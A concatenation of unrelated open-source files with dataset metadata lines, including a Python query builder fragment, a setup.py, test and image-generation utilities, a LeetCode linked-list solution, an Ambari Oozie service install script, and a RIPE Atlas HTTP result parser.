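        values = terms[term]
        # A leading "!" negates the whole clause for this term
        negate = len(values) > 0 and values[0] == "!"
        if negate:
            values = values[1:]
        if not values:
            continue
        clause = " OR ".join("%s:%s" % (term, v) for v in values)
        if negate:
            clause = "( NOT ( " + clause + " ) )"
        else:
            clause = "( " + clause + " )"
        clauses.append(clause)
    return " AND ".join(clauses)

print build_query({"project": ["nova"], "reviewer": ["!", "bob"]})
# ( project:nova ) AND ( NOT ( reviewer:bob ) )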
Hawaii-Smart-Energy-Project/Maui-Smart-Grid
setup.py
1
4642
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Setup script for MSG Data Processing and Operations. Additional file-based inclusions can be found in MANIFEST.in. The distribution archive is created as a source distribution, http://docs.python.org/2/distutils/sourcedist.html, using python setup.py sdist Installation is performed using python setup.py install [--prefix=${LIBRARY_PATH} --exec-prefix=${BIN_PATH] where the path arguments within the square brackets are optional. """ __author__ = 'Daniel Zhang (張道博)' __copyright__ = 'Copyright (c) 2014, University of Hawaii Smart Energy Project' __license__ = 'https://raw.github' \ '.com/Hawaii-Smart-Energy-Project/Maui-Smart-Grid/master/BSD' \ '-LICENSE.txt' from distutils.core import setup setup(name = 'Maui-Smart-Grid', version = '1.0.0', description = 'Data Processing and Data Operations for the Maui Smart ' 'Grid Project.', long_description = 'The University of Hawaii at Manoa was tasked with ' 'maintaining a data repository for use by analysts ' 'for the Maui Smart Grid (http://www.mauismartgrid' '.com) energy sustainability project through the ' 'Hawaii Natural Energy Institute (http://www.hnei' '.hawaii.edu). This software provides the data ' 'processing and operational resources necessary to ' 'accomplish this task. Source data arrives in ' 'multiple formats including XML, tab-separated ' 'values, and comma-separated values. Issues for this' ' project are tracked at the Hawaii Smart Energy ' 'Project YouTRACK instance (' 'http://smart-energy-project.myjetbrains' '.com/youtrack/rest/agile).', author = 'Daniel Zhang (張道博)', author_email = 'See https://github.com/dz1111', url = 'https://github.com/Hawaii-Smart-Energy-Project/Maui-Smart-Grid', license = 'https://raw.github' '.com/Hawaii-Smart-Energy-Project/Maui-Smart-Grid/master/BSD' '-LICENSE.txt', platforms = 'OS X, Linux', package_dir = {'': 'src'}, py_modules = [ 'filelock', 'meco_data_autoloader', 'meco_db_delete', 'meco_db_insert', 'meco_db_read', 'meco_dupe_check', 'meco_fk', 'meco_mapper', 'meco_plotting', 'meco_pv_readings_in_nonpv_mlh_notifier', 'meco_xml_parser', 'msg_aggregated_data', 'msg_configer', 'msg_data_aggregator', 'msg_data_verifier', 'msg_db_connector', 'msg_db_exporter', 'msg_db_util', 'msg_file_util', 'msg_logger', 'msg_math_util', 'msg_noaa_weather_data_dupe_checker', 'msg_noaa_weather_data_inserter', 'msg_noaa_weather_data_parser', 'msg_noaa_weather_data_util', 'msg_notifier', 'msg_python_util', 'msg_time_util', 'msg_types' ], scripts = [ 'src/automated-scripts/aggregateNewData.py', 'src/automated-scripts/autoloadNewMECOData.py', 'src/automated-scripts/exportDBsToCloud.py', 'src/automated-scripts/insertCompressedNOAAWeatherData.py', 'src/automated-scripts/insertMECOEnergyData.py', 'src/automated-scripts/insertSingleMECOEnergyDataFile.py', 'src/automated-scripts/reportExportSummary.py', 'src/automated-scripts/retrieveNOAAWeatherData.py', 'src/static-data-insert/insertCleanSCADAVoltageAndTapData.py', 'src/static-data-insert/insertLocationRecords.py', 'src/static-data-insert/insertMECOMeterLocationHistoryData.py', 'src/static-data-insert/insertMeterRecords.py', 'src/static-data-insert/insertNRELIrradianceData.py', 'src/static-data-insert/insertPowerMeterEvents.py', 'src/static-data-insert/insertSCADAWeatherData.py' ])
bsd-3-clause
7,457,005,088,255,912,000
43.951456
80
0.540605
false
4.050744
false
false
false
ctrevino/DIGITS
digits/dataset/images/classification/test_imageset_creator.py
1
2642
#!/usr/bin/env python """ Functions for creating temporary datasets Used in test_views """ import os import time import argparse from collections import defaultdict import numpy as np import PIL.Image IMAGE_SIZE = 10 IMAGE_COUNT = 10 # per category def create_classification_imageset(folder, image_size=None, image_count=None): """ Creates a folder of folders of images for classification """ if image_size is None: image_size = IMAGE_SIZE if image_count is None: image_count = IMAGE_COUNT # Stores the relative path of each image of the dataset paths = defaultdict(list) for class_name, pixel_index, rotation in [ ('red-to-right', 0, 0), ('green-to-top', 1, 90), ('blue-to-left', 2, 180), ]: os.makedirs(os.path.join(folder, class_name)) colors = np.linspace(200, 255, image_count) for i, color in enumerate(colors): pixel = [0, 0, 0] pixel[pixel_index] = color pil_img = _create_gradient_image(image_size, (0, 0, 0), pixel, rotation) img_path = os.path.join(class_name, str(i) + '.png') pil_img.save(os.path.join(folder, img_path)) paths[class_name].append(img_path) return paths def _create_gradient_image(size, color_from, color_to, rotation): """ Make an image with a color gradient with a specific rotation """ # create gradient rgb_arrays = [np.linspace(color_from[x], color_to[x], size).astype('uint8') for x in range(3)] gradient = np.concatenate(rgb_arrays) # extend to 2d picture = np.repeat(gradient, size) picture.shape = (3, size, size) # make image and rotate image = PIL.Image.fromarray(picture.T) image = image.rotate(rotation) return image if __name__ == '__main__': parser = argparse.ArgumentParser(description='Create-Imageset tool - DIGITS') ### Positional arguments parser.add_argument('folder', help='Where to save the images' ) ### Optional arguments parser.add_argument('-s', '--image_size', type=int, help='Size of the images') parser.add_argument('-c', '--image_count', type=int, help='How many images') args = vars(parser.parse_args()) print 'Creating images at "%s" ...' % args['folder'] start_time = time.time() create_classification_imageset(args['folder'], image_size=args['image_size'], image_count=args['image_count'], ) print 'Done after %s seconds' % (time.time() - start_time,)
bsd-3-clause
678,515,116,100,906,200
25.686869
98
0.603331
false
3.731638
false
false
false
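A brief usage sketch for the imageset creator above, assuming the module is importable as test_imageset_creator; the temporary output folder and the small size/count arguments are illustrative.

import tempfile

from test_imageset_creator import create_classification_imageset

folder = tempfile.mkdtemp()
paths = create_classification_imageset(folder, image_size=8, image_count=3)
for class_name in sorted(paths):
    # e.g. 'blue-to-left' ['blue-to-left/0.png', 'blue-to-left/1.png', ...]
    print class_name, paths[class_name]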
menghanY/LeetCode-Python
LinkedList/SwapNodesInPairs.py
1
1237
# https://leetcode.com/problems/swap-nodes-in-pairs/ from ListNode import ListNode class Solution(object): def swapPairs(self, head): # A dummy head simplifies swapping the first pair dummy = ListNode(0) dummy.next = head prev = dummy while prev.next and prev.next.next: first = prev.next second = first.next # Relink the pair: prev -> second -> first -> rest first.next = second.next second.next = first prev.next = second prev = first return dummy.next four = ListNode(4) three = ListNode(3) two = ListNode(2) one = ListNode(1) one.next = two two.next = three three.next = four # while one : # print(one.val) # one = one.next Solution().swapPairs(one)
mit
8,618,302,866,557,902,000
19.278689
52
0.497171
false
3.484507
false
false
false
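A small verification sketch for the pairwise swap above; it assumes the same ListNode class from that file, and the node values are illustrative.

def to_list(node):
    # Collect node values into a plain list for easy comparison
    vals = []
    while node:
        vals.append(node.val)
        node = node.next
    return vals

a, b, c, d = ListNode(1), ListNode(2), ListNode(3), ListNode(4)
a.next, b.next, c.next = b, c, d
print to_list(Solution().swapPairs(a))  # [2, 1, 4, 3]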
alexryndin/ambari
ambari-server/src/main/resources/common-services/OOZIE/4.0.0.2.0/package/scripts/oozie.py
1
23458
#!/usr/bin/env python """ Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ # Python Imports import os import re # Resource Management Imports from resource_management.core.resources.service import ServiceConfig from resource_management.core.resources.system import Directory, Execute, File from resource_management.core.source import DownloadSource from resource_management.core.source import InlineTemplate from resource_management.core.source import Template from resource_management.libraries.functions.format import format from resource_management.libraries.functions.default import default from resource_management.libraries.functions import StackFeature from resource_management.libraries.functions.version import format_stack_version from resource_management.libraries.functions.stack_features import check_stack_feature from resource_management.libraries.functions.oozie_prepare_war import prepare_war from resource_management.libraries.functions.copy_tarball import get_current_version from resource_management.libraries.resources.xml_config import XmlConfig from resource_management.libraries.script.script import Script from resource_management.libraries.functions.security_commons import update_credential_provider_path from resource_management.core.resources.packaging import Package from resource_management.core.shell import as_user, as_sudo, call from resource_management.core.exceptions import Fail from resource_management.libraries.functions.setup_atlas_hook import has_atlas_in_cluster, setup_atlas_hook from ambari_commons.constants import SERVICE, UPGRADE_TYPE_NON_ROLLING, UPGRADE_TYPE_ROLLING from resource_management.libraries.functions.constants import Direction from ambari_commons.os_family_impl import OsFamilyFuncImpl, OsFamilyImpl from ambari_commons import OSConst from ambari_commons.inet_utils import download_file from resource_management.core import Logger @OsFamilyFuncImpl(os_family=OSConst.WINSRV_FAMILY) def oozie(is_server=False, upgrade_type=None): import params from status_params import oozie_server_win_service_name XmlConfig("oozie-site.xml", conf_dir=params.oozie_conf_dir, configurations=params.config['configurations']['oozie-site'], owner=params.oozie_user, mode='f', configuration_attributes=params.config['configuration_attributes']['oozie-site'] ) File(os.path.join(params.oozie_conf_dir, "oozie-env.cmd"), owner=params.oozie_user, content=InlineTemplate(params.oozie_env_cmd_template) ) Directory(params.oozie_tmp_dir, owner=params.oozie_user, create_parents = True, ) if is_server: # Manually overriding service logon user & password set by the installation package ServiceConfig(oozie_server_win_service_name, action="change_user", username = params.oozie_user, password = Script.get_password(params.oozie_user)) download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], 
"sqljdbc4.jar"), os.path.join(params.oozie_root, "extra_libs", "sqljdbc4.jar") ) webapps_sqljdbc_path = os.path.join(params.oozie_home, "oozie-server", "webapps", "oozie", "WEB-INF", "lib", "sqljdbc4.jar") if os.path.isfile(webapps_sqljdbc_path): download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"), webapps_sqljdbc_path ) download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"), os.path.join(params.oozie_home, "share", "lib", "oozie", "sqljdbc4.jar") ) download_file(os.path.join(params.config['hostLevelParams']['jdk_location'], "sqljdbc4.jar"), os.path.join(params.oozie_home, "temp", "WEB-INF", "lib", "sqljdbc4.jar") ) # TODO: see if see can remove this @OsFamilyFuncImpl(os_family=OsFamilyImpl.DEFAULT) def oozie(is_server=False, upgrade_type=None): import params if is_server: params.HdfsResource(params.oozie_hdfs_user_dir, type="directory", action="create_on_execute", owner=params.oozie_user, mode=params.oozie_hdfs_user_mode ) params.HdfsResource(None, action="execute") Directory(params.conf_dir, create_parents = True, owner = params.oozie_user, group = params.user_group ) params.oozie_site = update_credential_provider_path(params.oozie_site, 'oozie-site', os.path.join(params.conf_dir, 'oozie-site.jceks'), params.oozie_user, params.user_group ) XmlConfig("oozie-site.xml", conf_dir = params.conf_dir, configurations = params.oozie_site, configuration_attributes=params.config['configuration_attributes']['oozie-site'], owner = params.oozie_user, group = params.user_group, mode = 0664 ) File(format("{conf_dir}/oozie-env.sh"), owner=params.oozie_user, content=InlineTemplate(params.oozie_env_sh_template), group=params.user_group, ) # On some OS this folder could be not exists, so we will create it before pushing there files Directory(params.limits_conf_dir, create_parents=True, owner='root', group='root' ) File(os.path.join(params.limits_conf_dir, 'oozie.conf'), owner='root', group='root', mode=0644, content=Template("oozie.conf.j2") ) if (params.log4j_props != None): File(format("{params.conf_dir}/oozie-log4j.properties"), mode=0644, group=params.user_group, owner=params.oozie_user, content=InlineTemplate(params.log4j_props) ) elif (os.path.exists(format("{params.conf_dir}/oozie-log4j.properties"))): File(format("{params.conf_dir}/oozie-log4j.properties"), mode=0644, group=params.user_group, owner=params.oozie_user ) if params.stack_version_formatted and check_stack_feature(StackFeature.OOZIE_ADMIN_USER, params.stack_version_formatted): File(format("{params.conf_dir}/adminusers.txt"), mode=0644, group=params.user_group, owner=params.oozie_user, content=Template('adminusers.txt.j2', oozie_admin_users=params.oozie_admin_users) ) else: File ( format("{params.conf_dir}/adminusers.txt"), owner = params.oozie_user, group = params.user_group ) if params.jdbc_driver_name == "com.mysql.jdbc.Driver" or \ params.jdbc_driver_name == "com.microsoft.sqlserver.jdbc.SQLServerDriver" or \ params.jdbc_driver_name == "org.postgresql.Driver" or \ params.jdbc_driver_name == "oracle.jdbc.driver.OracleDriver": File(format("/usr/lib/ambari-agent/{check_db_connection_jar_name}"), content = DownloadSource(format("{jdk_location}{check_db_connection_jar_name}")), ) pass oozie_ownership() if is_server: oozie_server_specific(upgrade_type) def oozie_ownership(): import params File ( format("{conf_dir}/hadoop-config.xml"), owner = params.oozie_user, group = params.user_group ) File ( format("{conf_dir}/oozie-default.xml"), owner = params.oozie_user, 
group = params.user_group ) Directory ( format("{conf_dir}/action-conf"), owner = params.oozie_user, group = params.user_group ) File ( format("{conf_dir}/action-conf/hive.xml"), owner = params.oozie_user, group = params.user_group ) def get_oozie_ext_zip_source_paths(upgrade_type, params): """ Get an ordered list of Oozie ext zip file paths from the source stack. :param upgrade_type: Upgrade type will be None if not in the middle of a stack upgrade. :param params: Expected to contain fields for ext_js_path, upgrade_direction, source_stack_name, and ext_js_file :return: Source paths to use for Oozie extension zip file """ # Default to /usr/share/$TARGETSTACK-oozie/ext-2.2.zip paths = [] source_ext_js_path = params.ext_js_path # Preferred location used by HDP and BigInsights 4.2.5 if upgrade_type is not None and params.upgrade_direction == Direction.UPGRADE: source_ext_js_path = "/usr/share/" + params.source_stack_name.upper() + "-oozie/" + params.ext_js_file paths.append(source_ext_js_path) # Alternate location used by BigInsights 4.2.0 when migrating to another stack. paths.append("/var/lib/oozie/" + params.ext_js_file) return paths def oozie_server_specific(upgrade_type): import params no_op_test = as_user(format("ls {pid_file} >/dev/null 2>&1 && ps -p `cat {pid_file}` >/dev/null 2>&1"), user=params.oozie_user) File(params.pid_file, action="delete", not_if=no_op_test ) oozie_server_directories = [format("{oozie_home}/{oozie_tmp_dir}"), params.oozie_pid_dir, params.oozie_log_dir, params.oozie_tmp_dir, params.oozie_data_dir, params.oozie_lib_dir, params.oozie_webapps_dir, params.oozie_webapps_conf_dir, params.oozie_server_dir] Directory( oozie_server_directories, owner = params.oozie_user, group = params.user_group, mode = 0755, create_parents = True, cd_access="a", ) Directory(params.oozie_libext_dir, create_parents = True, ) hashcode_file = format("{oozie_home}/.hashcode") skip_recreate_sharelib = format("test -f {hashcode_file} && test -d {oozie_home}/share") untar_sharelib = ('tar','-xvf',format('{oozie_home}/oozie-sharelib.tar.gz'),'-C',params.oozie_home) Execute( untar_sharelib, # time-expensive not_if = format("{no_op_test} || {skip_recreate_sharelib}"), sudo = True, ) configure_cmds = [] # Default to /usr/share/$TARGETSTACK-oozie/ext-2.2.zip as the first path source_ext_zip_paths = get_oozie_ext_zip_source_paths(upgrade_type, params) # Copy the first oozie ext-2.2.zip file that is found. # This uses a list to handle the cases when migrating from some versions of BigInsights to HDP. 
  if source_ext_zip_paths is not None:
    for source_ext_zip_path in source_ext_zip_paths:
      if os.path.isfile(source_ext_zip_path):
        configure_cmds.append(('cp', source_ext_zip_path, params.oozie_libext_dir))
        configure_cmds.append(('chown', format('{oozie_user}:{user_group}'), format('{oozie_libext_dir}/{ext_js_file}')))

        Execute(configure_cmds,
                not_if=no_op_test,
                sudo=True,
        )
        break

  Directory(params.oozie_webapps_conf_dir,
            owner = params.oozie_user,
            group = params.user_group,
            recursive_ownership = True,
            recursion_follow_links = True,
  )

  # download the database JAR
  download_database_library_if_needed()

  # Falcon EL extension
  if params.has_falcon_host:
    Execute(format('{sudo} cp {falcon_home}/oozie/ext/falcon-oozie-el-extension-*.jar {oozie_libext_dir}'),
            not_if  = no_op_test)

    Execute(format('{sudo} chown {oozie_user}:{user_group} {oozie_libext_dir}/falcon-oozie-el-extension-*.jar'),
            not_if  = no_op_test)

  if params.lzo_enabled and len(params.all_lzo_packages) > 0:
    Package(params.all_lzo_packages,
            retry_on_repo_unavailability=params.agent_stack_retry_on_unavailability,
            retry_count=params.agent_stack_retry_count)
    Execute(format('{sudo} cp {hadoop_lib_home}/hadoop-lzo*.jar {oozie_lib_dir}'),
            not_if  = no_op_test,
    )

  prepare_war(params)

  File(hashcode_file,
       mode = 0644,
  )

  if params.stack_version_formatted and check_stack_feature(StackFeature.OOZIE_CREATE_HIVE_TEZ_CONFIGS, params.stack_version_formatted):
    # Create hive-site and tez-site configs for oozie
    Directory(params.hive_conf_dir,
              create_parents = True,
              owner = params.oozie_user,
              group = params.user_group
    )
    if 'hive-site' in params.config['configurations']:
      hive_site_config = update_credential_provider_path(params.config['configurations']['hive-site'],
                                                         'hive-site',
                                                         os.path.join(params.hive_conf_dir, 'hive-site.jceks'),
                                                         params.oozie_user,
                                                         params.user_group
                                                         )
      XmlConfig("hive-site.xml",
                conf_dir=params.hive_conf_dir,
                configurations=hive_site_config,
                configuration_attributes=params.config['configuration_attributes']['hive-site'],
                owner=params.oozie_user,
                group=params.user_group,
                mode=0644
                )
    if 'tez-site' in params.config['configurations']:
      XmlConfig( "tez-site.xml",
                 conf_dir = params.hive_conf_dir,
                 configurations = params.config['configurations']['tez-site'],
                 configuration_attributes=params.config['configuration_attributes']['tez-site'],
                 owner = params.oozie_user,
                 group = params.user_group,
                 mode = 0664
      )

    # If Atlas is also installed, we need to generate the Atlas Hive hook (hive-atlas-application.properties file)
    # in the directory {stack_root}/{current_version}/atlas/hook/hive/
    # Because this is a .properties file instead of an xml file, it will not be read automatically by Oozie.
    # However, we should still save the file on this host so that we can upload it to the Oozie Sharelib in DFS.
    if has_atlas_in_cluster():
      atlas_hook_filepath = os.path.join(params.hive_conf_dir, params.atlas_hook_filename)
      Logger.info("Has atlas in cluster, will save Atlas Hive hook into location %s" % str(atlas_hook_filepath))
      setup_atlas_hook(SERVICE.HIVE, params.hive_atlas_application_properties, atlas_hook_filepath, params.oozie_user, params.user_group)

  Directory(params.oozie_server_dir,
            owner = params.oozie_user,
            group = params.user_group,
            recursive_ownership = True,
  )
  if params.security_enabled:
    File(os.path.join(params.conf_dir, 'zkmigrator_jaas.conf'),
         owner=params.oozie_user,
         group=params.user_group,
         content=Template("zkmigrator_jaas.conf.j2")
         )

def __parse_sharelib_from_output(output):
  """
  Return the parent directory of the first path from the output of the "oozie admin -shareliblist $comp" command.
  Output will match a pattern like:

  Potential errors
  [Available ShareLib]
  hive
    hdfs://server:8020/user/oozie/share/lib/lib_20160811235630/hive/file1.jar
    hdfs://server:8020/user/oozie/share/lib/lib_20160811235630/hive/file2.jar
  """
  if output is not None:
    pattern = re.compile(r"\[Available ShareLib\]\n\S*?\n(.*share.*)", re.IGNORECASE)
    m = pattern.search(output)
    if m and len(m.groups()) == 1:
      jar_path = m.group(1)
      # Remove leading/trailing spaces and get the containing directory
      sharelib_dir = os.path.dirname(jar_path.strip())
      return sharelib_dir
  return None

def copy_atlas_hive_hook_to_dfs_share_lib(upgrade_type=None, upgrade_direction=None):
  """
  If the Atlas Hive Hook directory is present, Atlas is installed, and this is the first Oozie Server,
  then copy the entire contents of that directory to the Oozie Sharelib in DFS, e.g.,
  /usr/$stack/$current_version/atlas/hook/hive/ -> hdfs:///user/oozie/share/lib/lib_$timestamp/hive

  :param upgrade_type: If in the middle of a stack upgrade, the type as UPGRADE_TYPE_ROLLING or UPGRADE_TYPE_NON_ROLLING
  :param upgrade_direction: If in the middle of a stack upgrade, the direction as Direction.UPGRADE or Direction.DOWNGRADE.
  """
  import params

  # Calculate the effective version since this code can also be called during EU/RU in the upgrade direction.
  effective_version = params.stack_version_formatted if upgrade_type is None else format_stack_version(params.version)
  if not check_stack_feature(StackFeature.ATLAS_HOOK_SUPPORT, effective_version):
    return

  # Important that oozie_server_hostnames is sorted by name so that this only runs on a single Oozie server.
  if not (len(params.oozie_server_hostnames) > 0 and params.hostname == params.oozie_server_hostnames[0]):
    Logger.debug("Will not attempt to copy the Atlas Hive hook to DFS since this is not the first Oozie Server "
                 "sorted by hostname.")
    return

  if not has_atlas_in_cluster():
    Logger.debug("Will not attempt to copy the Atlas Hive hook to DFS since Atlas is not installed on the cluster.")
    return

  if upgrade_type is not None and upgrade_direction == Direction.DOWNGRADE:
    Logger.debug("Will not attempt to copy the Atlas Hive hook to DFS since we are in the middle of a Rolling/Express upgrade "
                 "and performing a Downgrade.")
    return

  current_version = get_current_version()
  atlas_hive_hook_dir = format("{stack_root}/{current_version}/atlas/hook/hive/")
  if not os.path.exists(atlas_hive_hook_dir):
    Logger.error(format("ERROR. Atlas is installed in cluster but this Oozie server doesn't "
                        "contain directory {atlas_hive_hook_dir}"))
    return

  atlas_hive_hook_impl_dir = os.path.join(atlas_hive_hook_dir, "atlas-hive-plugin-impl")

  num_files = len([name for name in os.listdir(atlas_hive_hook_impl_dir) if os.path.exists(os.path.join(atlas_hive_hook_impl_dir, name))])
  Logger.info("Found %d files/directories inside Atlas Hive hook impl directory %s" % (num_files, atlas_hive_hook_impl_dir))

  # This can return over 100 files, so take the first 5 lines after "Available ShareLib"
  # Use -oozie http(s):localhost:{oozie_server_admin_port}/oozie as oozie-env does not export OOZIE_URL
  command = format(r'source {conf_dir}/oozie-env.sh ; oozie admin -oozie {oozie_base_url} -shareliblist hive | grep "\[Available ShareLib\]" -A 5')

  try:
    code, out = call(command, user=params.oozie_user, tries=10, try_sleep=5, logoutput=True)
    if code == 0 and out is not None:
      hive_sharelib_dir = __parse_sharelib_from_output(out)

      if hive_sharelib_dir is None:
        raise Fail("Could not parse Hive sharelib from output.")

      Logger.info("Parsed Hive sharelib = %s and will attempt to copy/replace %d files to it from %s" %
                  (hive_sharelib_dir, num_files, atlas_hive_hook_impl_dir))

      params.HdfsResource(hive_sharelib_dir,
                          type="directory",
                          action="create_on_execute",
                          source=atlas_hive_hook_impl_dir,
                          user=params.hdfs_user,
                          owner=params.oozie_user,
                          group=params.hdfs_user,
                          mode=0755,
                          recursive_chown=True,
                          recursive_chmod=True,
                          replace_existing_files=True
                          )

      Logger.info("Copying Atlas Hive hook properties file to Oozie Sharelib in DFS.")
      atlas_hook_filepath_source = os.path.join(params.hive_conf_dir, params.atlas_hook_filename)
      atlas_hook_file_path_dest_in_dfs = os.path.join(hive_sharelib_dir, params.atlas_hook_filename)
      params.HdfsResource(atlas_hook_file_path_dest_in_dfs,
                          type="file",
                          source=atlas_hook_filepath_source,
                          action="create_on_execute",
                          owner=params.oozie_user,
                          group=params.hdfs_user,
                          mode=0755,
                          replace_existing_files=True
                          )
      params.HdfsResource(None, action="execute")

      # Update the sharelib after making any changes
      # Use -oozie http(s):localhost:{oozie_server_admin_port}/oozie as oozie-env does not export OOZIE_URL
      command = format("source {conf_dir}/oozie-env.sh ; oozie admin -oozie {oozie_base_url} -sharelibupdate")
      code, out = call(command, user=params.oozie_user, tries=5, try_sleep=5, logoutput=True)
      if code == 0 and out is not None:
        Logger.info("Successfully updated the Oozie ShareLib")
      else:
        raise Exception("Could not update the Oozie ShareLib after uploading the Atlas Hive hook directory to DFS. "
                        "Code: %s" % str(code))
    else:
      raise Exception("Code is non-zero or output is empty. Code: %s" % str(code))
  except Fail, e:
    Logger.error("Failed to get Hive sharelib directory in DFS. %s" % str(e))

def download_database_library_if_needed(target_directory = None):
  """
  Downloads the library to use when connecting to the Oozie database, if
  necessary. The library will be downloaded to 'params.target' unless
  otherwise specified.
  :param target_directory: the location where the database library will be downloaded to.
  :return:
  """
  import params

  jdbc_drivers = ["com.mysql.jdbc.Driver",
                  "com.microsoft.sqlserver.jdbc.SQLServerDriver",
                  "oracle.jdbc.driver.OracleDriver", "sap.jdbc4.sqlanywhere.IDriver"]

  # check to see if the JDBC driver name is in the list of ones that need to
  # be downloaded
  if params.jdbc_driver_name not in jdbc_drivers or not params.jdbc_driver_jar:
    return

  if params.previous_jdbc_jar and os.path.isfile(params.previous_jdbc_jar):
    File(params.previous_jdbc_jar, action='delete')

  # if the target directory is not specified
  if target_directory is None:
    target_jar_with_directory = params.target
  else:
    # create the full path using the supplied target directory and the JDBC JAR
    target_jar_with_directory = target_directory + os.path.sep + params.jdbc_driver_jar

  if not os.path.exists(target_jar_with_directory):
    File(params.downloaded_custom_connector,
         content = DownloadSource(params.driver_curl_source))

    if params.sqla_db_used:
      untar_sqla_type2_driver = ('tar', '-xvf', params.downloaded_custom_connector, '-C', params.tmp_dir)

      Execute(untar_sqla_type2_driver, sudo = True)

      Execute(format("yes | {sudo} cp {jars_path_in_archive} {oozie_libext_dir}"))

      Directory(params.jdbc_libs_dir,
                create_parents = True)

      Execute(format("yes | {sudo} cp {libs_path_in_archive} {jdbc_libs_dir}"))

      Execute(format("{sudo} chown -R {oozie_user}:{user_group} {oozie_libext_dir}/*"))

    else:
      Execute(('cp', '--remove-destination', params.downloaded_custom_connector, target_jar_with_directory),
              path=["/bin", "/usr/bin/"],
              sudo = True)

  File(target_jar_with_directory, owner = params.oozie_user, group = params.user_group)
apache-2.0
5,204,235,272,387,705,000
41.728597
262
0.665956
false
3.656742
true
false
false
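The regex in __parse_sharelib_from_output above is easy to sanity-check in isolation. A minimal sketch, assuming only the Python standard library; the sample string is fabricated to match the shape described in that function's docstring:

import os
import re

# Fabricated "oozie admin -shareliblist hive" output in the documented shape.
sample = ("Potential errors\n"
          "[Available ShareLib]\n"
          "hive\n"
          "    hdfs://server:8020/user/oozie/share/lib/lib_20160811235630/hive/file1.jar\n")

pattern = re.compile(r"\[Available ShareLib\]\n\S*?\n(.*share.*)", re.IGNORECASE)
m = pattern.search(sample)
if m:
    # The parent directory of the first jar path is the component's sharelib directory.
    print(os.path.dirname(m.group(1).strip()))
    # -> hdfs://server:8020/user/oozie/share/lib/lib_20160811235630/hive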
jorisvandenbossche/ircelsos
ircelsos/tests/test_util.py
1
1165
# -*- coding: utf-8 -*-
from __future__ import print_function, division

import unittest

import pytest

from ircelsos.util import print_stations, print_pollutants
from ircelsos import metadata


def strip(s):
    s = s.splitlines()
    s = [line.strip() for line in s]
    s = "\n".join(s)
    return s


@pytest.mark.usefixtures("capsys")
class TestTablePrinting():

    def test_print_stations(self, capsys):
        print_stations(['BETR801', 'BETR802'])
        out, err = capsys.readouterr()
        expected = """name   | EU_code | location   | region | type
        -------+---------+------------+--------+--------
        42R801 | BETR801 | Borgerhout | urban  | Traffic
        42R802 | BETR802 | Borgerhout | urban  | Traffic

        """
        assert strip(out) == strip(expected)

    def test_print_pollutants(self, capsys):
        print_pollutants(['42602 - NO2', '44201 - O3'])
        out, err = capsys.readouterr()
        expected = """id          | short | name             | stations
        ------------+-------+------------------+---------
        42602 - NO2 | no2   | Nitrogen dioxide | 105
        44201 - O3  | o3    | Ozone            | 47

        """
        assert strip(out) == strip(expected)
bsd-2-clause
5,899,053,136,330,087,000
26.738095
71
0.556223
false
3.25419
true
false
false
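The tests above combine pytest's capsys fixture with a whitespace-normalizing strip() helper so the assertions are not brittle about table alignment. A self-contained sketch of the same pattern; print_table here is illustrative and not part of ircelsos:

def print_table():
    print("a | b")
    print("1 | 2")

def test_print_table(capsys):
    # capsys is injected by pytest; readouterr() returns captured stdout/stderr.
    print_table()
    out, err = capsys.readouterr()
    assert out == "a | b\n1 | 2\n"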
PhilipHomburg/ripe.atlas.sagan
ripe/atlas/sagan/http.py
1
2943
from .base import Result, ValidationMixin


class Response(ValidationMixin):

    def __init__(self, data, **kwargs):

        ValidationMixin.__init__(self, **kwargs)

        self.raw_data = data

        self.af = self.ensure("af", int)
        self.body_size = self.ensure("bsize", int)
        self.head_size = self.ensure("hsize", int)
        self.destination_address = self.ensure("dst_addr", str)
        self.source_address = self.ensure("src_addr", str)
        self.code = self.ensure("res", int)
        self.response_time = self.ensure("rt", float)
        self.version = self.ensure("ver", str)

        if not self.destination_address:
            self.destination_address = self.ensure(
                "addr", str, self.destination_address)

        if not self.source_address:
            self.source_address = self.ensure(
                "srcaddr", str, self.source_address)

        if not self.code:
            self._handle_malformation("No response code available")

        error = self.ensure("err", str)
        if error:
            self._handle_error(error)


class HttpResult(Result):

    METHOD_GET = "GET"
    METHOD_POST = "POST"
    METHOD_PUT = "PUT"
    METHOD_DELETE = "DELETE"
    METHOD_HEAD = "HEAD"

    METHODS = {
        METHOD_GET: "GET",
        METHOD_POST: "POST",
        METHOD_PUT: "PUT",
        METHOD_DELETE: "DELETE",
        METHOD_HEAD: "HEAD"
    }

    def __init__(self, data, **kwargs):

        Result.__init__(self, data, **kwargs)

        self.uri = self.ensure("uri", str)
        self.method = None
        self.responses = []

        if "result" not in self.raw_data:
            self._handle_malformation("No result value found")
            return

        if isinstance(self.raw_data["result"], list):  # All modern results

            for response in self.raw_data["result"]:
                self.responses.append(Response(response, **kwargs))

            if self.responses:
                method = self.raw_data["result"][0].get(
                    "method",
                    self.raw_data["result"][0].get("mode")  # Firmware == 4300
                )
                if method:
                    method = method.replace("4", "").replace("6", "")
                    if method in self.METHODS.keys():
                        self.method = self.METHODS[method]

        else:  # Firmware <= 1

            response = self.raw_data["result"].split(" ")
            self.method = response[0].replace("4", "").replace("6", "")
            self.responses.append(Response({
                "dst_addr": response[1],
                "rt": float(response[2]) * 1000,
                "res": int(response[3]),
                "hsize": int(response[4]),
                "bsize": int(response[5]),
            }))


__all__ = (
    "HttpResult"
)
gpl-3.0
4,170,459,175,948,925,000
29.978947
89
0.49983
false
3.982409
false
false
false
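HttpResult above accepts two wire formats: modern firmware reports a list of response dicts, while firmware <= 1 packs one response into a single space-separated string. A sketch of the old-format split; the sample line and its field values are made up, and the * 1000 suggests (though the file does not state) that old firmware reported the response time in seconds:

# Hypothetical firmware <= 1 result string: method, address, rt, code, hsize, bsize
line = "GET4 193.0.6.139 0.231 200 263 1406"
fields = line.split(" ")

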